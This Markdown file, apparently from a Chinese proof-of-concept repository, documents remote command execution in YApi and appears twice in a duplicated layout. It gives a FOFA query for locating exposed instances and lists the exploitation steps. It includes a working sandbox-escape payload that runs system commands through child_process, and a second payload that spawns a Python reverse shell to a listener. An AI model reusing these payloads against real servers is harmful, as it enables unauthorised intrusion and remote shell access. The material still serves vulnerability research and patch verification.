wy876_POC/Yapi/Yapi存在远程命令执行漏洞.md

# Yapi存在远程命令执行漏洞
Yapi存在远程命令执行漏洞

## fofa

```javascript
app="YApi"
```

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d.png)

## poc
注册账号登录

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06.png)

新建项目

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2.png)

添加接口

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889123950-560b7590-201a-477d-98e0-aba7da89b62a.png)

```java
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
```

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622.png)

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52.png)

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7.png)

反弹shell

```java
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
Poc = process.mainModule.require("child_process").spawnSync(
  'python', ['-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
)
```

![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8.png)
20241214更新 2024-12-14 11:17:46 +08:00			`# Yapi存在远程命令执行漏洞`
			`Yapi存在远程命令执行漏洞`

			`## fofa`

			```javascript
			`app="YApi"`
			```

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889052543-d9462fa4-5ed8-49c3-90e0-0e22bdb0bf3d.png)`

			`## poc`
			`注册账号登录`

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889068979-94f17c91-b7c5-4736-b63a-ec608cf02a06.png)`

			`新建项目`

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889103239-3d32f9de-1ae6-4668-802b-4ba25b36ede2.png)`

			`添加接口`

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889123950-560b7590-201a-477d-98e0-aba7da89b62a.png)`

			```java
			`const sandbox = this`
			`const ObjectConstructor = this.constructor`
			`const FunctionConstructor = ObjectConstructor.constructor`
			`const myfun = FunctionConstructor('return process')`
			`const process = myfun()`
			`mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()`
			```

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889157562-bdbc7f22-a8c2-4a3c-a54a-4203d7dd3622.png)`

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889175163-7053a924-2cc1-4bbf-9f22-18d333698b52.png)`

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733889186745-cec84584-2bb5-4a9f-af14-0c06944989d7.png)`

			`反弹shell`

			```java
			`const sandbox = this`
			`const ObjectConstructor = this.constructor`
			`const FunctionConstructor = ObjectConstructor.constructor`
			`const myfun = FunctionConstructor('return process')`
			`const process = myfun()`
			`Poc = process.mainModule.require("child_process").spawnSync(`
			`'python', ['-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",6699));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']`
			`)`
			```

			`![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733892630767-39caa4e3-fb60-405e-99ef-5c4ac2d09df8.png)`